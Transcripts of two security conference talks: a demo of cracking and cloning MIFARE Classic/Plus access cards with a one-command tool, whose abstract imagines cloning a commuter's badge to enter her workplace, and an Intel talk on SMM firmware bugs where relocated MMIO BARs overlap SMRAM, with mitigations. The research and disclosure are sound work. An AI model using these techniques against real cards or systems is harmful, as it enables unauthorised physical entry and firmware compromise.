Heidelberg there's a great training called RFID security and privacy nightmares these the guys that give this training were the ones that kind of got me interested in this so I highly recommend that if you guys are heading to Troopers this year and I have a short demo here if you want to see it live. So here I have a myFare plus card this would not you could not crack this with MFOC so all you have to do is run this if you could actually see it. So what it's doing here I'll start it over well you can see it I just ran the script with no parameters you can see here that there's two there's two keys that are unknown key A and key B for sector 13 so here it's actually all it's trying to do is authenticate to the card over and over and over again collecting different unique encrypted nonces and after a short period of time it kind of varies depending on the card and the key how long it'll take and while that's running I have another demo with a real lock and if you guys have interest you can stop by and see me afterward so this this actually works with my fair classic it doesn't work with the with the plus because it's a bad lock I bought off eBay so you can see here this is a card that actually allows me to enter the enter the room it turns blue this is a key that does not it's another key that does not and I'll show you that I can clone that and enter the door pretty pretty quickly this has a runtime of approximately between I would say five minutes to to an hour and I didn't pick a key that takes an hour don't worry and then in the output of the script you can see here it's actually it said the PRNG is not vulnerable to the nested attack so it's it automatically selects the sectors to use and here it's it reduced the key space down to like two to the 36 so it's going to brute force from here this might go a little bit faster with a better laptop but it should do the trick here so another another note I guess for for things like hotels and things like that most of them are using their kind of their own version of encryption or or a data format on the card so it's not like if you can crack the card for one hotel you can change your check-in time for every hotel things like that are typically proprietary so in this case it's it's found the keys on this card and says do you want to clone the card you could say yes or no put a new card on and it and you'd be able to clone the card and so here's a case where this card did not let me in the in the lock before I'm just going to run the script and in this case it was it's not a my fur plus card so it's able to crack it very very very fast and I can say yep clone the card I cloned the wrong one that's the demo that's why I had a static demo all right here's the card that got me in and yes I want to clone the card onto my onto my Chinese clone which doesn't want to stay so I say yes so and now I can get in any questions so the phase where you collect the nonsense you need to have the card physically the whole time or can you do a dump you need to have the card in order to do a dump you have to have the keys so in order to read certain sectors you need to have the keys so you need to have you need to have the card on the reader during the collection process but you don't need it for the brute force phase okay how long does the gathering take how long do you need physical access to collect it typically depends on the card or the key or which key it is like from my what I've seen is between five minutes and an hour so it's not it's certainly not a case where you can do it you know just bump in and steal it you know in any case maybe if you have on a long train ride all right thank you
|
The presentation will show how easy it can be to crack not just Mifare Classic but the new Mifare Plus which have an improved PRNG which nullifies MFCUK/MFOC which currently crack Mifare Classic. I have taken portions of code from the Proxmark3 and LibNFC to combine into one tool that works with a $30 usb reader which looks just like a usb thumbdrive, and requires no arguments whatsoever. Simply place a card on the reader, run: $ ./miLazyCracker And the script will talk to the card, determine if the PRNG is vulnerable or not, and select the proper attack. From there it will iterate through any missing keys and finally dump the card so it can be cloned. The talk also shows how to create cards with open source tools (this part is not new but it’s easily explained). I am a Masters student in Computer Science and have worked with embedded devices for about 10 years and most recently worked in cyber security research. I love everything smart card related, wireless (zigbee, zwave, 6LoPAN), hardware hacking, reversing .NET and patching programs to do crazy stuff. I think this is cool because anyone can clone a card (or see if its clonable) with no prior knowledge of smart cards, no learning about sector layouts and what arguments to give to the script whatsoever, and it only a $30 part which looks like a usb thumb drive. This makes it very possible to sit on a bus or subway next to the lady who has her badge in her purse and potentially clone her card, follow her to work and gain access to a building. Its not necessarily the most novel reverse engineering feat but it bring smart card cloning (and attacks as recent as 6 months old) to the masses. this isn’t so more people can break in, but so companies can be aware of how easy this is and to move away from anything with the name Mifare.
|
10.5446/32396 (DOI)
|
Hey guys, my name is Alex, here is Yuri. We are working on Advanced and Threat Research Team at Intel and we are here to present the new presentation, Bering the System, new vulnerabilities in Corbuth and UFI-based system. Before we go to the presentation, I want to say thank you to the organizers of Recon, Hugo Sam, NeoAsum, Recon Brussels, Asum. Thank you very much. Yeah, so today we will present the new type of vulnerability and in our agenda we have that small recap about the previous vulnerabilities, then introduction about memory Mapo-Dio, then description about MMIO bar overlap issue, examples of this issue in UFI, firmware and Corbuth firmware, limitations, mitigations, tools, and conclusion. The recap is really important for this presentation because the vulnerability is a little bit similar to the previous one and in many perspective and exploitability in the modules when we found them. So what is a semi-poisoned point or bug? So in NIC-36 system you have couple privileged level and the most privileged is SMM and there is a mechanism to communicate between the operation system and SMM mode and it's going like that. The impression system allocates the buffer, then pass the address of the buffer through some structure and depends on the version of the firmware and then the SMM code reads that buffer and depends on functionality, it can read or write. In ADK 1, based on the buffer, the address of the buffer will pass through general purpose register, RBX. In ADK 2, there is a mechanism named combBuffer and the address of combBuffer is passing through UFI's API table. And in normal behavior, the address of this combBuffer is somewhere controlled by the operation system. But if we point in the address back to SMM, SMM doesn't have a check and we have arbitrary write in SMM code. Using this write primitive, we usually control the address where to write but we not often control the data. At some of the exploits which we demonstrated previously, we are write zeros. And then to make an exploit, we find the structure in CPU state, SMB register, and when we write this register, the next SMM will start executing from unprotected memory and ring zero attacker can control it and make a privilege escalation to the SMM code. Then this vulnerability was fixed by adding the check in SMM handlers. So SMM handler check the address is not pointing to SMM. But what if we have scenario when we have hypervisor or for example hypervisor basis protection like VSM or just a hyperread with root partition. In this case, we can point the address in general purpose register or in combBuffer to some of the structure of the hypervisor and overwrite it. And in this case, the untrusted guest from ring zero make a privilege escalation to the hypervisor. The interesting fact is that even if this vulnerability is patched in the firmware and firmware is fully protected, the untrusted guest can use it to make a privilege escalation like confused gravity attack when there is no vulnerability but you can still exploit and make a code execution in the hypervisor. And we demonstrated the exploit to the VSM which basically used some firmware vulnerability to compromise VSM and dump credentials. We made this demo in 2015. And it was another example of SMI pointer vulnerability founded by ATR and then published by Sogeti as a club. The vulnerability is pretty similar that we found. So it reading the buffer from the general purpose registry, but the buffer to the function read flash data. And in the function read flash data using the function read and you control on the offset of the destination you control the source and the size. In this case, there is no checks where the address will be. So if you address is in the surround, you can dump and read and write SMM. Really nice write up. Also the material published many couple presentation, couple blog post about different type of SMM pointer vulnerabilities. So how the community and vendors react on this, how we fix it. There is a protection which I already mentioned to check that the address not pointing to the SMM and through function SMM is buffer outside SMM valid. It fixing the problem with the firmware, but it doesn't fix the problem with the hypervisor and the vulnerability and bypass privilege escalation to the hypervisor. So to fix this vulnerability, there was another mitigation added to the limit comb buffer address. So address now should be fixed and there is a CPI table, name Windows SMM mitigation CPI table, which is basically should be initialized by the firmware and read by the operation system which is passing the configuration of the mitigation. And there is couple bits there. One is defining that the common buffer is fixed and then defined location and the SMM is checking all of the input and output buffer. Another one is nested. That meaning that if you have a pointer inside the comb buffer, it checking this pointers as well. And another protection is that you have locked some of the configuration of the hardware after exit boot serve. And the exit boot services, for example, interrupt controller, IOMMU and so on. That kind of mitigation was added after we published this research and communicators and others. A little bit about MMO because this bug is really reliant to different behavior of the MMO. In the system to communicate to the device, there is a special express protocol and in this protocol, there is a fabrics which contain multiple components that components interconnected to certain topologies. In this topology, there is a root complex which has multiple ports. There is endpoints, switches, bridges. All of them is connected via PCI express link. Every physical component has up to eight virtual physical functions and all of them may integrate to the root complex. So basically, this protocol is aligned to talk to the device and send DMA and so on. Every device has PCI config space in the device and the PCI config space contain the header of the... The header then it contain the PCI express capability structure and the extensions. So the entire structure is 4K but without extensions, it's 256 bytes. To get the access to the PCI and PCI configuration, there is two interfaces. One is to get access to PCI configuration space using port IO CFA, CRC. Then we construct the address knowing the bus device and function and offset which we want to read from the specific device and then the pass it through the CRC. We can read and write to specific register in PCI configuration. To get access to the extended configuration space, we need to use an enhanced configuration access mechanism. We just apply it as memory map. We basically use memory which is split by 4K by each bus device function and through that memory we can access to the extension configuration space of the device and read the register from there. So to read them, we are using MMU control memory map config register plus bus multiply 32 multiply 8 multiply 1k plus device multiply 8 multiply 1k plus function plus offset. Then we construct the address, then we use it as a memory access and we can read and write register. So there basically all of that configuration, all of that PCI configuration is for storing some configuration register for the device. But even 4K was not enough for modern devices. They want to store much more like graphics want to store megabytes. And here was the error when the MMO became. So the MMO is the range of memory and access to that range is forwarding to the device. And device will handle that. And this ranges is defined through MMO bars. And MMO bars is in PCI config space which we are talking in previous slide. And if you see like there is a header of the PCI configuration space and there is device ID, there is vendor ID, status register, some other register and then the base under zero is the first MMO bar. As you see here, there is just the address. So we don't know the size. The bars itself, they are self-aligned. Meaning if you write all Fs to the bar, the base which didn't flip from zero to one is the base which defined the size of the MMO bar. For example, if there is one byte, didn't flip, then meaning that you have the 256 size of the bar, 256 byte. There is the simplified version of the layout in the memory just to get the small representation of where is MMO is. So we have a loader arm, then there is SMM protected by SMRRs and there is a graphic memory. Then we have Tolloot and there is a memory map config. Then there is loader arm with all of the bar which was defined through PCI config space. And there is a direct map and BIOS and there we have high gerund. So all of the bars should be defined somewhere here. And here is a couple of examples of the MMO bars. There is the name of the bar, like GTT MMO other which has the address of 0,0,0,2,0,10 with 10 is offset and then it has the size, the two megabytes. So all of them is you can use a chip seg tool to just run MMO list and then write the known PCIe bars, MMO bars, sorry. So one of the important aspects of the MMO range registry, MMO bars is that they can be reallocatable at runtime and OS can relocate them to any other location. Some of the MMO bars is not reallocatable. They are fixed or locket by the firmware but some of them are reallocated. And now Yuri will explain why it is an issue. Hey everyone. I take it you can hear me. So I've just noticed that all of the animation that I spent hours on is pretty much gone from the slides. That's convenient. I guess the difference between PowerPoint and PowerPoint Viewer. Anyway, so how is that related to what Alex has been talking about? These issues are dependent on this memory mapped IE configuration behavior. In fact they are kind of caused by the way firmware talks to the devices through the memory mapped IE. So the way firmware uses this memory mapped IE mechanism and communicates with the devices is that, and this is specifically to the SMI handlers but keep in mind that the entire firmware including the boot firmware regardless of which type of firmware that is, UFI based firmware or core boot based firmware or just legacy bias or anything else also talks to the devices through the memory mapped IE mechanism. So there is a PCI configuration space in each device or actually each virtual device or a function of a device PCI configurator and it has this base address register which defines the base of the memory range for that particular device. And so what usually SMI handlers do as well as any other boot firmware, they get the base register, they read the base register to get the base address of this SMI range and then they either read registers within that range, SMI registers or write those registers or read, modify, write those registers. So basically in order to send IO cycles to the particular device. And so yeah, so this is how they essentially communicate with the devices. Now the problem, the theory of the problem becomes that there is an implicit trust assumption on the firmware side, on the firmware part that those are hardware registers. So therefore they are part of the hardware and hardware is part of the trust boundary and so basically firmware for the most part trusts all of the hardware, including those registers. So there is an assumption that nobody can change those registers. However those are just ring zero accessible registers that could be modified by any ring zero code. So that's one example of what the ring zero code or west level code can do or the code, the ring three code if it has enough privileges to talk to the PCI config space. Let's say modify PCI config registers like this bar register. So the problem is that the string zero code or west level code can modify those bar registers and relocate the range for a particular device somewhere else in physical address addressable space. It could be somewhere in other MMO. It could be overlapping with some other things. But it can also be in the DRAM in the system memory and specifically one particular location where the attacker would be interested in is the system management mode memory. So the exploit code could modify and relocate the memory map to a range to overlap with the SMRAM. Then when SMI interrupt is generated either by hardware or by the attack code itself, the SMI handler firmware attempts to communicate with the device through this memory map to a range. Attempts to read registers or write registers. And so basically instead of actually sending cycles to the device as MMO cycles which are memory cycles on the PCI bus, it sends memory transactions to its own memory or some other memory depending on where the attack code relocated this MMO range. So that potentially can either expose data because it reads its own memory or basically modify the control flow somehow if it reads some attacker manipulated data or it can potentially corrupt the memory because of the memory write cycles to the MMO registers. So that's the theory of this problem. And what we've observed in multiple types of firmware including UFI and Corbett firmware are is that the SMI handlers communicate with a lot of MMO bars. My examples include EHCI USB2 bars, Gigabit Ethernet LAN, root complex MMO, that's the main MMO for the PCIHS. Or specifically the SPI registers, then basically in order to communicate with the SPI flash, write to the SPI flash or read from the SPI flash. HCI SATA controller MMO, XHCI USB3 controller, integrated graphics device MMO basically GTT MMADR range for the graphics device. Or some other MMOs like for example the I think it's a LID controller or something on a different bus on the specific systems. It could be more. This is what we've seen. It could be more. So there might be a specific system that has a specific SMI handler which communicates with a specific device. Or maybe has some functionality specific to that system communicating with a generic device. So this is an example. This is an example of communicating with a SPI controller in order to read something from SPI flash or write something to SPI flash. So there's a command basically, the first command is attempting to store a persistent configuration for the UFI firmware into the SPI flash. It's called UFI variable if you're familiar but basically it's the configuration of the firmware. So this is the first command attempts to store something into the SPI flash, this configuration. The second command just dumps the SPI memory map range, all the registers. I don't show all the registers here, I'm just showing the registers that I'm interested in. And so you can see that there's a SPI status and control register which tells the status of the SPI cycle and also sends that SPI cycle on the SPI bus. There's an SPI flash address, it's the register that is programmed with the flash address on the SPI flash device. And there's also a whole bunch of registers that are programmed with the contents of what you want to write to the SPI flash or what you want to read from the SPI flash. So in this particular case, this is the contents of that variable that I've been writing in the first command. So you can see all 42, 42, that's B, right? So the contents of the variable was all Bs. And you can see that all of these registers now contain the contents of the variable. So obviously if we overlap this SPI memory range with something else like the SMRAM or some other page protected, then we can cause this contents of the variables written onto that range. So how do we find this type of issue? So obviously, you know, SMI handler is writing something to SPI bar or to any MMI bar. So it looks like to find all those problems, it's just easy as dump the contents of the MMI range, then cause the SMI, and then dump again and see which registers changed in the SMI. And now you know that the SMI handler modified those registers. And this is a lot more complex than that. And initially we thought it would be very similar to identify those issues at runtime, but in reality it's pretty complex. And the reason is because those are not memory contents. So in addition to firmware, other parties are also writing to those registers. So the hardware itself, the devices or integrated controllers or some logic in the hardware writes to those registers in pretty much any MMI bar, for example, some of the bars like graphics bars, the hardware writes to thousands of registers in the MMI range. So it's pretty difficult to actually identify which registers have been modified by the SMI code itself. So that's kind of the high level, all entire flow, how we kind of solved that problem. So basically what we do is that we, for every MMI range, we dump the MMI range multiple times with a delay, let's say 20 times, and we find all of the registers that normally change without SMI handlers. So we add those registers to the list and call it a normal difference or something like that. And then we trigger SMIs or cause a function like the variable write that would trigger an SMI. And then we ever, after every SMI we dump that range again, see which registers have changed and compare them with that normal difference, with the registers that normally change. If we see any new register that is not part of that normal difference, basically we suspect that this register might have been changed in the SMI handler. So we send an SMI the same SMI again, maybe even multiple times, to confirm that this register changes every time we send the same SMI. And even with that mechanism, there are lots of false positives because even when we create normal difference, we don't catch all of the registers. So it happens that when you trigger an SMI, some register changes, but it's not really because of the SMI handler, but because of the device decided that at this moment I want to write to that new register. Oh, awesome. That's not the end. So that's an example, essentially, just of running this sort of a tool that monitors the changes in the SMI bar. This particular example monitors changes in the EHCI USB bar, and you can see that then it created normal difference with just two registers normally change. Then it triggered multiple SMIs, and the first SMI found that one register, additional register changed, so it re-triggered that SMI again, and that register didn't change. It also can be a false negative as well because the SMI handler might be flipping a bit, flipping one, flipping back, and so on. But this is a suspect to investigate later. So this was a theory about the issues. So now I'll give you a few examples of those issues in UFI firmware as well as in Corbwood. So we'll start with the UFI. So how do we find those issues in the binary? Let's say we have EFI binaries, we load them in EIDA, and how do we find those? So one way of finding those type of issues is you can find places where SMI handlers or the firmware reads the contents of the base address register. Because we know their addresses, for every device we know the address of the base address register. So for example, this GBE LAN MMO bar, it has multiple MMO ranges, one of them is so-called MMO bar A, M-bar, which is defined by the offset 10 hex. And the GBE LAN device is the bus zero device 25, also 29, I think, function zero. So the firmware can use two mechanisms, as Alex described. One is the legacy mechanism through the CFA, CFC, IO ports, and one is enhanced mechanism through the memory map config space. So the first mechanism used in the address of that bar register for the first mechanism is calculated as device number, left shift, 11 bits, plus the offset. There's also, of course, bus number, left shift, 15 bits, I think, and the function number. But in this case, bus zero and function zero. So we have an address of that register, which is pretty unique in a lot of cases, when it's used with the legacy PCI config access mechanism. And when you set enable bit for the PCI config cycle, which is bit 31, then you have eight and C8, 10 for the semi-bar of GBE LAN device. So for the second mechanism, it's calculated similarly. So you have a memory map config space divided into four kilobyte chunks for each bus device function. And the register is somewhere within the four kilobyte chunk for that particular device. And so you need to add a memory map config base address of this memory map config space. And you need to add an offset. You need to find this four kilobyte chunk within the memory map config space. And then you need to find the register within that four kilobyte chunk. So you calculate the offset to that register pretty similarly. And remember that this mechanism allows you to access all of the PCI header, all of the four kilobytes of registers, rather than 100 to 256 bytes of registers. So that's why you have C8, 0, 10 instead of C8, 10 as in the previous. So you have a constant. You have this total address in memory, physical address in memory for that particular bar. Now you can identify all the places where firmware uses that bar or reads that bar. Once you do that, once you do that, you can figure out how the firmware uses that bar. Does it check that the address is somewhere else or does it not? So does it read or write to the registers in the bar? So this is the example for the GB LAN MOU bar in the device 25. This is the first, we call it M-bar, M-M-I-O, the yellow thing. And the second, no, sorry, the third access, the third constant, you can see F80C80CC. That's reading configuration register from the GB LAN config space, but it's a different register. It's a bar management control status register. So the bar itself is the F80C010. That's one of the reds. And so that's where a firmware reads the actual address of the bar. And now then later on, you can see that the firmware is actually writing or reading some registers in that bar. It's not very clear on this particular screenshot, so it's better to look at the next screenshot. Now you can see that the firmware is using that M-M-I-O range, M-bar-O range, and writing some values. There is writing some register that the attacker controls or writing some constant value, let's say this 7123, I don't know what that constant is, to the edges or offset 32 decimal in this M-bar M-M-I-O. So it's writing some values to the registers. And so this is the, without actually checking, so there's no check for that M-M-I-O range, whether it overlaps with SMRAM or whether it's overlapping with something else. So there's no checking. So basically by modifying M-bar in the config space of that GB LAN device, you could potentially control where the SMI handler is writing data. This is another example for the USB M-M-I-O bar, and it's pretty similar. So you calculate, oh great, I didn't actually put the actual final constant. But you can see that there is a USB base address register is read from the offset 10 hex of the EHCI M-M-I-O controller. And then there are accesses to the offsets of that range, access to offset 20 at the bottom of the slide, where it flips the bits. It doesn't write control values, it just flips the bits. And this is also an example where in this assembly you don't see the actual constant, the full address in the memory map config space, because the address is calculated. But you do see an address of the memory map config space, then you see the offset of the bar register. So there are multiple ways to do that. So it also helps with finding those issues. It also helps to find the actual functions that read or write configuration space. So the first function on the left, it uses the legacy PCI configuration mechanism through CFA TFC. You can see CFA TFC ports there. The bottom one is using extended mechanism. It uses memory map configuration access to read write configuration registers. The right part is just an example of how firmware uses that. So you can see that it writes, it reads the register B8 in device 31 and then writes some value to that register. So it reads modify write. Yeah, it actually, yeah, it writes and then returns. So basically what it's doing, it's clearing status bits, most likely. So those were examples in the UFI firmware. Let's talk about those examples in the core bit. By now you probably understood that these issues are not really specific to the type of firmware used, because those issues are depending on the platform architecture. It's the firmware trying to communicate with the PCIe endpoint devices on the PCIe, on the platform that adheres to PCIe architecture. So regardless of which type of firmware you have, core boot or legacy BIOS or UFI based BIOS, those issues might exist. So because we have a source code for core boot, and by the way, I just wanted to thank the core boot team and Ron in particular for working with us on this. So because we have a source code for core boot, we can look at the source code. So in order to find those issues on core boot, you can do this. You can find the functions that read PCIe configuration registers as in the previous slides in the source code. And then you can find functions that are writing to the memory map to your ranges. So in particular in core boot, those are functions PCIe read config 32 or PCIe read config 16 to read the configuration registers. And then functions write 16 write 32 or read 16 read 32 in order to read or write memory mapped registers. So in this particular case, you can see that the firmware is reading the MMI range from a integrated graphics device at offset 10 hex. And then it's writing some register to the PPControl offset of that range in the graphics range with a specific value, which it's calculating before. Sometimes in the source code, obviously the developers are naming the bars with their names as they defined in the platform specs or chipset specs or SOC specs. And so for example, on Intel systems, you can find those accesses by just most of the bars by their names, either our CBA or spy bars by MMI or PCIe based address and so on. So you can look up the bar register names and just essentially just grab all the source code by the names. So that's a particular example in mainboard IO trap handler, SMI handler in core boot. So this SMI handler, it's not in software SMI handler, so it's not the SMI handler that you would trigger by writing some value into the B2 register IO board. It's an SMI handler that is caused by the chipset on trapping of IO cycle to some other port. It's called IO trap mechanism. I won't describe in details that mechanism, but basically it's another way to trigger a lot of SMI handlers on the platforms, probably the second most used mechanism to generate SMIs. And so what this SMI handler does, it reads an MMI range based address from a device 0 on bus 1, it offset 18 hex, it reads the address, and then it's checking one register. It's called LVTMA BL mode level in that MMI range. It checks whether the value is greater than 10 hex. If it is, then it tries to either decrease it. If it's less than F0, then it tries to increase it. So what it's doing is essentially it's trying to change the brightness, and you probably don't see this. So basically when you press the button on that core boot system, it would generate an SMI and depending on which button you pressed, it decreases the brightness of the screen or increases the brightness of the screen. So it does that by reading the contents of the register, incrementing or decrementing the contents of the register, and then writing it back. So basically, potentially by pressing the button, you can, and overlapping that bar with something else like SMM RAM, you can cause the SMI handler to override itself and get the potentially memory corruption or code execution. Or the ring zero attacker might generate that SMI on your behalf without pressing the button. So another case is a core bit firmer, is another SMI handler, it's called backlight off, which is very similar, but it's triggered when you press the power button and the system goes to S5, soft shutdown. And so SMIs are generated, the firmer takes control, it needs to turn off devices, including it wants to turn off the brightness, not brightness, it needs to turn off the backlight to the screen. And so I don't remember the specific system that this SMI handler was on, but basically what it's doing, it's again, it's reading a register base, the base for the MMO range of the integrated graphics device, and it also writes a different value to the same PPControl register on entering S5. So potentially by entering S5, you can control the value of the offset in the memory that you overlapped, well, in the memory that you overlapped with the graphics device at my bar, or the attacker in this case would need to simulate the S5 event, trigger event, and prevent the system from going actually into the S5, but still causing the SMI handler by just directly calling that SMI handler. So by now you might have figured that there are lots of moving cards in this type of bugs, in this type of issues. There are limitations. The first limitation for the exploit is that the SMI handlers or any other firmware is writing to specific offsets. So you don't really control, fully control the address. You don't have an arbitrary write primitive. You only control the base address plus the offset. And the bars, like Alex mentioned, most of the bars are self-aligned or size-aligned. So if you have a four kilobyte large bar, the MMI range, then it's aligned on a four kilobyte boundary. This is not a requirement. This is most of the platforms do that. But architecturally, PCI-SIG, PCI architecture defined that the bars might be as small as 16 bytes and aligned at 16 bytes. So there might be MMI ranges that are as small as 16 bytes, and you pretty much have a fine granularity of the address that you control. But for four kilobyte bytes, you have quite a few possibilities to override. And for larger bars, let's say 16 kilobytes, that becomes more difficult. For bars that are even larger, like the graphics device bar, those bars are four megabyte large. You have a very few possibilities. And the exploit may not be able to control the values that are written because the firmware model or the SMI handler typically writes specific values or flips specific bits at those offsets or even read a value, then modify it somehow and write or read the value and write to some other register. So you may not, the exploit may not control the values. Although as you saw for some MMI ranges, the exploit might control. So for example, in the variable writes example, you saw all the contents of the variable that you fully control. The other limitation is that because those are memory maps, IO ranges, those are not regular memory, DRAM ranges, then that means that the firmware is actually implementing a protocol in a lot of cases. So it's not just writing. Like I want to write zero to this offset. No. It usually implements some sort of protocol. And protocol could be as simple as read the value. If that value has some, you know, if that register has specific value or it's greater or less than something, then write to somewhere else. That's easily controllable because you don't just relocate the bar into memory. You also create the contents in memory of all of the registers as if they were in the MMI range. So you can control that. But if the protocol is more complex, like for example, the firmware is issuing specific cycles on a specific bus, then it's typically writing to some registers, then reading back other registers, pulling on the values in those registers, then writing something else. So in that case, you may not really be able to control that because you only have one chance. You populated the fake MMI range in memory. And if the firmware writes something and expects it to change, then you're out of luck because you don't have any agents running in parallel. In certain cases, that might be bypassable in platforms, but in larger cases, you're out of luck in this case. So plus, there are lots of conditions. The SMI handler will write to that bar depending on, let's say, platform mode. Are we in the ACPI mode or not? Is the device I'm communicating with supporting this functionality, this mode or this feature? And plus, even triggering those SMIs that communicate with the devices might even cause some complications because it's not as just the trigger SMI 3 writing to port B2. No, those SMI handlers that you saw might be caused when you enter S3 or exit S3, resume from S3, or when you enter a soft shut down or something like that. So kind of a complication on how you even trigger the interrupts. So yeah. And for a certain number of bars that are non-architectural, basically they're not defined in the PCI compatible space below 40 hex in the PCI header. Those bars might be locked down by the firmware. So there is a mechanism in the hardware that allows you to just lock down the register and after you lock it down until reset, nobody can change. So for those bars, you cannot relocate them. Of course, the firmware might forget to lock them down, as we saw many times. But in that case, you can relocate even lockable bars. But if firmware doesn't forget to lock down all the bars, then you cannot relocate them to memory. You can relocate something else and overlap with the bar, but that's a different story. So what are the options for to mitigate those attacks? One option is that the SMI handlers can verify that the address, base address of the MMI range that it read from the bar register doesn't overlap with SMRAM. That's a pretty straightforward mitigation and it's similar to the mitigation that was done for the previous type of class of issues, the pointer bugs, and it should be done. It doesn't hurt to really check the pointer that you're not writing to your own code. But it only solves the problem partially. It prevents you from overwriting the contents of SMRAM, but it doesn't prevent you from pointing that address that you will write to something else outside of SMRAM. Let's say hypervisor protected pages or Winner-Stan, VBS protected pages. So in that case, the mitigation might be a difference. The firmware and SMI handlers might verify that the address, base address of the MMI range is actually in the MMIO, in the memory map that you saw from Alex's part of the presentation. It's above this top of low-usable DRAM. So you can check that the bar is actually in that range and not overlapping, not pointing somewhere inside the DRAM. That's a good mitigation, although you still might be writing to somewhere you shouldn't been able to write. So it's also partial mitigation, I think. So there is another option that the firmware and SMI handlers might do is when the system boots, the boot firmware might allocate the default range, the reserve range in the MMIO and place all the bars there. And when the SMI handlers are invoked at runtime during the OS execution, then the SMI handler might check the value of the base address for the MMI range and check if it's within this default reserve range. If it's not forced into the default range, it's in its default location and use the default location. And then upon exit, just restore the value or leave it there. It depends on the firmware implementation. In this case, you're just forcing that the SMI handler runtime firmware will write to a known good location, kind of fixed location for the MMIO. And that particular third mitigation was done for the spy bar, example with the arbitrary constants of the variable that could be written by the exploit. So in that case, starting later, Skylake systems, I think the boot firmware allocates the range at FE01 and 40s in physical addressable space for the SPI MMIO range. And so on any SMI, PCH type SMI, the chipset type SMI, the SMI handler checks that the base address of this SPI MMIO range is at that address. And if it's not, then it basically overrides it with the default FE01 value. Then the SMI handler perceives doing what it needs to do and basically kind of preventing you from overlapping the range with anything else that you shouldn't have access to. So that's kind of a screenshot with this example of this mitigation. First the attacker relocates the SPI bar overlaps it with something else, just regular DRM memory, then causes the variable write that generates an SMI. And upon exit from the SMI, I'm just checking the value of the SPI bar and you can see that it actually changed to the default location. So I'll basically try to show you that on this system. You may not be able to see that on the back, but you can later on, you can use that. You can check. So I'm reading a offset 10 hex and the device 31 function 5, that's the SPI controller on later systems. So I'm reading and you can see it has value FE0140. On this laptop, the keyboard is typing numbers on its own without my help. So now we'll check just the number of SMIs. You can see that 15 hex SMIs has been generated so far. Then I'm relocating the bar. Yeah. Sorry, since I started it, showing that with the individual commands. So I'm relocating the bar to this address, which is in memory. For the presentation, I've prepared it and copied the contents of the SPI bar into that memory. So checking the bar again, so you can see that it relocated now points to SPI, SPI memory map range now points to DRM. And then I'm writing contents of the variables. You can see that the write was successful, even though the SMI handler should not have access to this SPI controller in this case, because I relocated to some bogus memory. It's not a SPI and OMI range anymore, no longer. So it's already assigned that the attack didn't really succeed. So I'm reading the contents of the bar again, and you can see that it got restored to the original location. I'm checking the value of the SMI, and you saw 15 there. Now it's 19 hex. So you got four SMIs generated during this operation, one per logical CPU. And so I'm checking the contents of the bar, so MMIO dump SPI bar, and not at this address. I'll just dump it to somewhere here, SPI log. And you can see that the contents of the variable that I wrote are actually in the MMI range. So the variable that I wrote is this. It has all of the Bs, so 42 hex. So that basically shows that this laptop, this system, restores the SPI MMI range to default location, and then only then proceeds to communicate with the SPI flash device. All right, so we will have a couple of tools that can find those issues at runtime. Obviously you can proceed with disassembling the binaries or looking at the source code, but we will release a couple of tools that will help finding those issues. So one is that just finds all of the registers that the SMI handler writes to, modify, and the other one is the one that attempts to actually relocate all the MMI ranges into memory, then files the SMIs and see if the memory contents changed. None of these tools are perfect, they give false positives, false negatives, so it's more of a, they need to be complemented with manual analysis. So the root causes of this type of issues is that the firmware assumes that all of the hardware is trusted, including all of the registers in the configuration registers for all the hardware devices or the entire chipset that are not modified by some malicious code, for example, lockdown. And so the firmware shouldn't assume that the contents of the base address registers are immutable because any rings or code can modify most of them, and they can be relocated to anywhere in memory, including on top of the SMRM itself. And so therefore kind of check the contents or addresses of those registers. This problem is not specific to the SMM because the SMM, it's pretty obvious target here because there's a runtime firmware, but even the boot firmware that reads contents of some of the registers upon, let's say, resume from sleep using the boot script or reads contents of the MMI ranges from somewhere else, like UFI variables, it also can be tricked into using memory ranges which are not really MMI ranges, but something else and potentially can override its own code. So the boot firmware should do the same thing as the runtime firmware. So I think that's all. We have a couple minutes for questions. Thank you for listening. Hello. Thanks guys for your talk. So you were talking about kind of with the goal in mind of getting code execution in the context of the SMI. Have you seen this type of attack utilized in the virtualized environment where if you're a guest and a hypervisor that's allowing pass through to PCI devices, causing relocation so that you would overwrite into the host kernel or something like that to break out? Yeah. Thanks, Rach, for the question. So we haven't verified all of the hypervisors, but we have done some analysis on, let's say, VSM and when you are in Windows 10 normal world partition, it allows you to write to the bar registers. So we have not done the full analysis of whether this can be used or it cannot be used as an attack, but at least the entry points are there. And for other hypervisors, if that would be possible to use this type of attacks against the hypervisors, then that might be possible from administrative guests only, not from unprivileged guests. Okay. And then one other quick question. You were talking about a lot of the behavior in the SMIs is to do a read, modify, and write. So I was just thinking like this vector, if you had an offset into a kernel where you would have a predictable increment of that counter, is there a way basically to block it and loop that increments in normal behavior? Does that make sense? It does. I definitely not sure that there is a way to block it on the kernel level. But also, I don't think you would attack the kernel itself with this because in the general case, you have to have an access to the PCI configuration space of the devices so in order to relocate the memory mapped base addresses somewhere else in the memory. And that already assumes that you have write access to the PCI config space, which is bring zero in majority of the cases. So you wouldn't use this attack to attack kernel, I guess. Right. Well, I was thinking in the virtualized environment. But yes. Oh, yeah. Okay. So on the virtualized environment, sorry. In the virtualized environment, the hypervisor might prevent, of course, the first way to prevent that is to not allow any guest, including administrative guest, from not allow to modify the base address of MI ranges. That's the first and pretty straightforward and should be done. But you can also monitor memory with extended page tables and cause a bit of violations on certain events. But that would be, I guess, performance heavy. Hi. Thanks for the interesting talks. I have a question regarding the relocation of the MMI bar register that you are talking about in the last slides. You told that some new SMI handler may verify the contact of the register and restore it to the original location, right? But the sort of things that I have not understood is that the hardware has designed this for a reason that maybe some device would like to relocate the MMI bar register for some reason of accessing the memory map register. And my question is, how can you recognize when it's legal to do that or it's not legal to do that? I mean, there is some way to trigger an SMI handler that is an hardware one from software. Let me see, Andrea. You had multiple questions in the same question. So is it legal to modify the, you know, which software legitimately can modify the base address registers for the MMI bars? Exactly. Generally, PCI architecture allows OS to relocate MMI ranges any time at once. In a lot of cases, I don't think that happens often rather than when OS just, you know, bits. So this is a PCI architectural capability so that any operating system can relocate ranges because they need to do, you know, devices may be added, they have ranges, and so they should be able to relocate all the ranges. So I don't think there is a generic way to know where the, you know, relocation of the ranges is legal or not. Again with a virtualized environment, you can prevent it at runtime. Actually, the latest mitigation that you show in your laptop, you show that the MMI bar register has been restored. Right. And what I was wondering, in that case, you can't do for each SMI handler the same things because maybe someone needs to do legally. Oh, okay. Yeah, I get it. So you cannot do the same mitigation for all the SMI handlers. That's your question. I think you're correct that it's not a very generic mitigation. And that's 